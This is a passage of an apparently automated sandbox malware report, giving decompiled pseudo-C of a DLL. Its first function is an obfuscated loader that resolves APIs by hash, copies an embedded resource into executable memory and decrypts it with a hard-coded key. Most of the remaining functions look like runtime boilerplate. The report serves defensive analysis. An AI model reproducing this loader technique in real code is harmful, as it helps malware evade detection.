						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x761b66e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}

APIs

FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
LoadResource.KERNEL32(?,00000000), ref: 1000636C
SizeofResource.KERNEL32(?,00000000), ref: 10006378
VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
memcpy.MSVCRT ref: 100064D9
malloc.MSVCRT ref: 100064E4
??3@YAXPAX@Z.MSVCRT ref: 10006523

Strings

ntdll.dll, xrefs: 1000618C
msvcrt.dll, xrefs: 100061B1
kernel32.dll, xrefs: 1000613D
8nGA7ohfFpugG(l$!#2u__*t5EaFD77, xrefs: 100064EC

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
API String ID: 3024364686-882265788
Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D

Uniqueness

Uniqueness Score: -1.00%

Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x2ae0b20
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x2ae0b20
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x2ae0b20
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x2ae0b20
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x2ae0b20
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
GlobalHandle.KERNEL32(02AE0B20), ref: 100374B1
GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
GlobalReAlloc.KERNEL32 ref: 100374CF
GlobalHandle.KERNEL32(02AE0B20), ref: 100374E1
GlobalLock.KERNEL32 ref: 100374E8
LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
GlobalLock.KERNEL32 ref: 100374FD
LeaveCriticalSection.KERNEL32(?), ref: 10037545

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99); // executed
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}

APIs

GetStartupInfoA.KERNEL32(?), ref: 100161A9
GetFileType.KERNEL32(?), ref: 10016253
GetStdHandle.KERNEL32(-000000F6), ref: 100162D4

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01

Uniqueness

Uniqueness Score: -1.00%

Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}

APIs

VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19

Uniqueness

Uniqueness Score: -1.00%

Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
